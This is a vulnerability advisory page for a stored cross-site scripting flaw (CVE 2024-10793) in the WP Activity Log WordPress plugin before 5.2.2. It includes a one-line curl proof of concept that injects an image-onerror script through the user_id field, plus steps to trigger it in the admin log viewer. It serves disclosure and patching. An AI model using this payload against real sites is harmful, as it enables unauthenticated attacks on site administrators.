WP Activity Log < 5.2.2 – Unauthenticated Stored Cross-Site Scripting via User_id Parameter | CVE 2024-10793 | Plugin Vulnerabilities

Description

The plugin is vulnerable to Stored Cross-Site Scripting via the user_id due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page.

Proof of Concept

curl -X POST 'https://example.com/wp-admin/admin-post.php' --data "action=destroy-sessions&user_id=<img src onerror=alert(/XSS/)>"

Then access the Log Viewer dashboard of the plugin (/wp-admin/admin.php?page=wsal-auditlog) and click on the More details of the related log to trigger the XSS

Affects Plugins

wp-security-audit-log

Fixed in 5.2.2

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/44f3b2e4-c537-4369-b2d6-39fbc6cb8e08

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

mikemyers

Verified

Yes

WPVDB ID

7adb2bd4-2503-4d8f-9c67-7a4d5ee921e1

Timeline

Publicly Published

2024-11-14 (about 1 year ago)

Added

2024-11-18 (about 1 year ago)

Last Updated

2024-11-18 (about 1 year ago)

Other

Published

Title

Published

2022-09-30

Title

CRM Perks Forms < 1.1.1 - Reflected XSS

Published

2025-03-29

Title

JetSmartFilters < 3.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-10-12

Title

Print, PDF, Email by PrintFriendly < 5.5.2 - Admin+ Stored XSS

Published

2025-04-01

Title

Post Custom Templates Lite <= 1.14 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2016-02-24

Title

WP Ultimate Exporter 1.0.0 - Reflected Cross-Site Scripting (XSS)